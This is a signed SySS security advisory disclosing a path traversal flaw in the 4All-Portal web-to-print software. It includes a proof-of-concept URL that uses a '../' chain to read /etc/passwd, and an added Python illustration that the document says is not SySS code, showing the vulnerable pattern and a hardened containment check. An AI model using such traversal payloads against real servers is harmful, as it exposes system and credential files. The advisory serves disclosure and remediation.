-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-042
Product: 4All-Portal
Manufacturer: Cross Media - die Daten und Netz GmbH
Affected Version(s): Unknown
Tested Version(s): 2.7
Vulnerability Type: Path Traversal (CWE-22)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2016-05-13
Solution Date: 2016-09-12
Public Disclosure: 2016-11-29
CVE Reference: Not assigned
Author of Advisory: Sascha Muenzberg (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

4All-Portal is a web-based web-to-print workflow solution.

The software manufacturer describes the application as follows (see [1]):

"The 4All-Portal is a highly flexible web-to-print platform for managing,
creating and publishing of publications in online and print media. Various
modules enable flexible scaling of the software – so that the portal grows
with your requirements."

Due to improper input validation, the web application is vulnerable to
Path Traversal attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

SySS GmbH found that the web application passes the value of a URL
parameter into a file system access without any further input validation.
By supplying "../" sequences in this parameter, an unauthenticated attacker
can read arbitrary files on the server that are accessible to the web
application process.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following URL can be used to download the /etc/passwd file:

https://example.com/UserManagement/GetMAMGuiAsset?customerName=np&filename=../../../../../../../../../../../../../../etc/passwd

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade to version 2.10 or later.
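The following Python snippet is an added illustration for this advisory; it
is not code from 4All-Portal or from SySS GmbH. The asset directory
(/srv/portal/assets), the function names and the sample file names are
assumptions made for the illustration; only the filename value is the one
from the PoC above. It places the vulnerable pattern described in the
Vulnerability Details, a request parameter concatenated into a file system
path, next to a containment check that resolves the path first and rejects
the PoC payload, absolute paths, traversal in the customerName parameter and
sibling directories that merely share a name prefix:

```python
import os
from pathlib import Path

# Assumed asset root for the illustration; the real 4All-Portal directory
# layout is not known from the advisory.
ASSET_ROOT = Path("/srv/portal/assets")

# The filename value from the advisory's proof of concept.
POC_FILENAME = "../../../../../../../../../../../../../../etc/passwd"


def vulnerable_asset_path(customer_name: str, filename: str) -> Path:
    """Vulnerable pattern (hypothetical reconstruction): the request parameter
    is appended to the asset directory and opened as-is. The path is returned
    normalized, which is what the kernel does with the '..' segments on open().
    Surplus '..' segments above '/' are simply dropped on POSIX, so an attacker
    can over-supply them without knowing the directory depth."""
    return Path(os.path.normpath(ASSET_ROOT / customer_name / filename))


def safe_asset_path(customer_name: str, filename: str) -> Path:
    """Hardened version: resolve the candidate path and require that it stays
    inside the customer's asset directory. Run this on the decoded parameter
    values the web framework hands over, not on the raw query string."""
    # customerName must be a single path component: no separators, no '.'/'..'.
    if customer_name in ("", ".", "..") or any(
        sep in customer_name for sep in ("/", "\\", "\0")
    ):
        raise ValueError(f"invalid customerName: {customer_name!r}")
    if not filename:
        raise ValueError("filename must not be empty")

    base = (ASSET_ROOT / customer_name).resolve()
    # Joining an absolute 'filename' discards 'base' entirely; resolve() then
    # collapses '..' and follows any symlinks in the existing part of the path,
    # so the containment check below sees the path the OS would actually open.
    candidate = (base / filename).resolve()
    try:
        # relative_to() compares whole components, so '.../assets/np2/x' is not
        # accepted as being under '.../assets/np' the way a string prefix
        # comparison would accept it.
        candidate.relative_to(base)
    except ValueError:
        raise PermissionError(f"path traversal rejected: {filename!r}") from None
    return candidate


def request_allowed(customer_name: str, filename: str) -> bool:
    """True if the hardened check would serve the request, False if rejected."""
    try:
        safe_asset_path(customer_name, filename)
        return True
    except (ValueError, PermissionError):
        return False


if __name__ == "__main__":
    print("vulnerable pattern resolves PoC to:", vulnerable_asset_path("np", POC_FILENAME))
    for args in (("np", POC_FILENAME), ("np", "/etc/passwd"),
                 ("np", "../np2/secret.pdf"), ("../../etc", "passwd"),
                 ("np", "brochure.pdf")):
        print(args, "->", "served" if request_allowed(*args) else "rejected")
```

Stripping "../" from the parameter is not an adequate fix: it misses absolute
paths, alternative encodings and sibling directories, all of which the
containment check above handles by deciding on the resolved path rather than
on the attacker-controlled string.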
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2016-05-03: Vulnerability discovered
2016-05-13: Vulnerability reported to manufacturer
2016-07-13: Manufacturer proposes alternative release schedule
2016-09-12: Public release of fixed version
2016-11-29: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Vendor description of 4All-Portal
    http://www.4all-portal.net/en/
[2] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/
[3] SySS GmbH, SYSS-2016-042
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-042.txt

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

Security vulnerability found by Sascha Muenzberg of the SySS GmbH.

E-Mail: sascha.muenzberg@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Muenzberg.asc
Key ID: 0x73033C4F
Key Fingerprint: 63FF 27B8 3E36 5475 1C0E CB5D 27C6 0C38 7303 3C4F

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and
without warranty of any kind. Details of this security advisory may be
updated in order to provide as accurate information as possible. The latest
version of this security advisory is available on the SySS Web site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJYPAWtAAoJECfGDDhzAzxPHXYQAMuSbgb2k8P4qJuUaq5HqdzA
Gbnbriq203lERWcjCxqF2gBa6LHmQ9pPR+lbpWm5/PyTvicZkt4Ck+aKETqWvUzQ
26hazmrx/+T16bu3PYEFJCqOohFKFsJ+UVM03idL4C4gNoGXZYh2hrRHgXoIl5W5
i2rZFfA8oWe23W1X5nw4I81y6CMGIraPUmPJZatQLKRk84ManUReUKNdJ0nKxqU5
eOmmRON0zIg4T/UXYouMc5GG8GHyrWAv5WhU4C7Pjmk4K+2qbbMKEV6cewT7O43x
jEhfmr60WwHbSTTIszQ3U5fbRFjfGFYNXa4CnDSXV6IJGwY3fC4kWLWp2DlKw9C7
zwXb738L8rPzwZP+cmfP8yxFmClZC/4qwN2dSAJC/LWXjKBEB0sk0vggV6qqlnfQ
/JWEGE6WwWMpLVXR4fcgvzKpgbGfy6jrTmKrRWSV4gXjWF6id0gd4eFq8KZiApYT
hJhxS9Tsq7yvsiCt310IbxkA1AzKiZ/VPEnfs1VYlHwrr0x9Cns2tpkiDbwm1mK1
W4MvwnzCMjSb/Ds/rPiv7uIxGZThgUdoCQxmoLskSHPa2RY868gQ6d5d3oyJiils
QFYJvqLgb/v1Oa5dbQD5oo4l0L2jz6Bz0HFcvJMlDEMm0ljQqHbUA2b0J1MY2wvS
FgDgviQhSvJ4KLazDA/C
=0ZIN
-----END PGP SIGNATURE-----